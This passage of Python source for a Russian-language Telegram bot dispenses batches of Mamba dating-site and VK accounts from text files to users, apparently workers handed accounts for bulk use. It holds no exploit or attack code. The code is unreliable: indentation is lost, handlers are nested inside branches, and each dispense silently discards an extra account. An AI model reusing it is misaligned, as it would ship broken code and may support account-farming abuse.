bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mambaua)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close()
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Две мамбы")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mambaua)
bot.send_message(m.chat.id, mambaua1, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close()
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Три мамбы")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
mambaua2 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это уже дело)) \n '+mambaua)
bot.send_message(m.chat.id, mambaua1)
bot.send_message(m.chat.id, mambaua2, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (mambaua2)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close()
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Четыре мамбы")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
mambaua2 = uaaccount.pop (0)
del uaaccount[0]
mambaua3 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это сильно)) \n '+mambaua)
bot.send_message(m.chat.id, mambaua1)
bot.send_message(m.chat.id, mambaua2)
bot.send_message(m.chat.id, mambaua3, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (mambaua2)
print (mambaua3)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close()
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
elif mambauaresult == '0' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(message.chat.id, "Не осталось совсем, реально, ждите, пока закинут. \nАкков: " + mambauaresult, reply_markup=user_markup)
else :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('Одна мамба')
user_markup.row('Две мамбы')
user_markup.row('Три мамбы')
user_markup.row('Четыре мамбы')
user_markup.row('Пять мамб')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько нужно? \nВ наличии: " + mambauaresult, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Одна мамба")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mambaua, reply_markup=user_markup)
bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mambaua)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close()
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Две мамбы")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mambaua)
bot.send_message(m.chat.id, mambaua1, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close()
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Три мамбы")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
mambaua2 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это уже дело)) \n '+mambaua)
bot.send_message(m.chat.id, mambaua1)
bot.send_message(m.chat.id, mambaua2, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (mambaua2)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close()
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Четыре мамбы")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
mambaua2 = uaaccount.pop (0)
del uaaccount[0]
mambaua3 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это сильно)) \n '+mambaua)
bot.send_message(m.chat.id, mambaua1)
bot.send_message(m.chat.id, mambaua2)
bot.send_message(m.chat.id, mambaua3, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (mambaua2)
print (mambaua3)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close()
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Пять мамб")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
mambaua2 = uaaccount.pop (0)
del uaaccount[0]
mambaua3 = uaaccount.pop (0)
del uaaccount[0]
mambaua4 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, если ты справишься с ними... \n '+mambaua)
bot.send_message(m.chat.id, mambaua1)
bot.send_message(m.chat.id, mambaua2)
bot.send_message(m.chat.id, mambaua3)
bot.send_message(m.chat.id, mambaua4, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (mambaua2)
print (mambaua3)
print (mambaua4)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close()
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
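# Same stock-count-then-keyboard pattern, now for the Kiev VK file (vkkiev.txt).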
@bot.message_handler(func=lambda message: message.text == "Получить вк Киев")
def handle_text(message):
#orig_vkua = open('vkorigua.txt', 'r+')
rab_vkua = open('vkkiev.txt', 'r+')
vk_list_ua = (rab_vkua.read())
vklist_ua = vk_list_ua.split('\n')
vk_proverka_ua = [x for x in vklist_ua if x != '']
vkuaresultat = str(len(vk_proverka_ua))
print(vkuaresultat)
#ovk_list_ua = (orig_vkua.read())
#ovklist_ua = ovk_list_ua.split('\n')
#vkresult_ua = []
#for index in vk_proverka_ua:
# if index in ovklist_ua:
# vkresult_ua.append(index)
#print(len(vkresult_ua))
#vkuaresultat = str(len(vkresult_ua))
if vkuaresultat == '1':
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1 акк')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + vkuaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == '1 акк')
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vkkiev)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vkkiev)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close()
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
elif vkuaresultat == '2' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1 акк')
user_markup.row('2 акка')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + vkuaresultat, reply_markup=user_markup)
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + vkuaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == '1 акк')
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vkkiev)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vkkiev)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close()
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "2 акка")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, два так два. Мне не жалко...\n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1,reply_markup=user_markup)
print (vkkiev+' '+vkkiev1)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close()
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
elif vkuaresultat == '3' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1 акк')
user_markup.row('2 акка')
user_markup.row('3 акка')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + vkuaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == '1 акк')
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vkkiev)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vkkiev)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close()
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "2 акка")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, два так два. Мне не жалко...\n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1,reply_markup=user_markup)
print (vkkiev+' '+vkkiev1)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close()
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "3 акка")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev2 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'О, мастер своего дела?;) \n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1)
bot.send_message(m.chat.id, vkkiev2, reply_markup=user_markup)
print (vkkiev+' '+vkkiev1+' '+vkkiev2)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close()
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
elif vkuaresultat == '4' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1 акк')
user_markup.row('2 акка')
user_markup.row('3 акка')
user_markup.row('4 акка')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + vkuaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == '1 акк')
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vkkiev)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vkkiev)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close()
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "2 акка")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, два так два. Мне не жалко...\n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1,reply_markup=user_markup)
print (vkkiev+' '+vkkiev1)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close()
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "3 акка")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev2 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'О, мастер своего дела?;) \n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1)
bot.send_message(m.chat.id, vkkiev2, reply_markup=user_markup)
print (vkkiev+' '+vkkiev1+' '+vkkiev2)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close()
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "4 акка")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev2 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev3 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, раз так хочешь... \n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1)
bot.send_message(m.chat.id, vkkiev2)
bot.send_message(m.chat.id, vkkiev3, reply_markup=user_markup)
print (vkkiev+" "+vkkiev1+" "+vkkiev2+" "+vkkiev3)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close()
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
elif vkuaresultat == '0':
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(message.chat.id, "Закончились, совсем. \nАкков: " + vkuaresultat, reply_markup=user_markup)
else:
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1 акк')
user_markup.row('2 акка')
user_markup.row('3 акка')
user_markup.row('4 акка')
user_markup.row('5 акков')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + vkuaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == '1 акк')
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vkkiev)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vkkiev)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close()
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "2 акка")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, два так два. Мне не жалко...\n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1,reply_markup=user_markup)
print (vkkiev+' '+vkkiev1)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close()
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "3 акка")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev2 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'О, мастер своего дела?;) \n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1)
bot.send_message(m.chat.id, vkkiev2, reply_markup=user_markup)
print (vkkiev+' '+vkkiev1+' '+vkkiev2)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close()
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "4 акка")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev2 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev3 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, раз так хочешь... \n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1)
bot.send_message(m.chat.id, vkkiev2)
bot.send_message(m.chat.id, vkkiev3, reply_markup=user_markup)
print (vkkiev+" "+vkkiev1+" "+vkkiev2+" "+vkkiev3)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close()
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "5 акков")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev2 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev3 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev4 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ого, а справишься?) \n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1)
bot.send_message(m.chat.id, vkkiev2)
bot.send_message(m.chat.id, vkkiev3)
bot.send_message(m.chat.id, vkkiev4, reply_markup=user_markup)
print (vkkiev+' '+vkkiev1+' '+vkkiev2+' '+vkkiev3+' '+vkkiev4)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close()
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
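# Moscow Mamba stock (mamba.txt): the same flow again, with spelled-out numerals as button labels.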
@bot.message_handler(func=lambda message: message.text == "Получить мамбу МСК")
def handle_text(message):
#orig_mamba = open('mambaorig.txt', 'r+')
rab_mamba = open('mamba.txt', 'r+')
mamba_list = (rab_mamba.read())
mambalist = mamba_list.split('\n')
mambishche = [x for x in mambalist if x != '']
mambaresultat = str(len(mambishche))
print(mambaresultat)
#omambalist = (orig_mamba.read())
#omamba_list = omambalist.split('\n')
#result = []
#for index in mambishche:
# if index in omamba_list:
# result.append(index)
#print(len(result))
#mambaresultat = str(len(result))
#############
if mambaresultat == '1':
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('Одну')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + mambaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Одну")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mamba, reply_markup=user_markup)
bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mamba)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close()
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
elif mambaresultat == '2' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('Одну')
user_markup.row('Две')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + mambaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Одну")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mamba, reply_markup=user_markup)
bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mamba)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close()
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Две")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mamba)
bot.send_message(m.chat.id, mamba1, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close()
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
elif mambaresultat == '3' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('Одну')
user_markup.row('Две')
user_markup.row('Три')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + mambaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Одну")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mamba, reply_markup=user_markup)
bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mamba)
print (a)
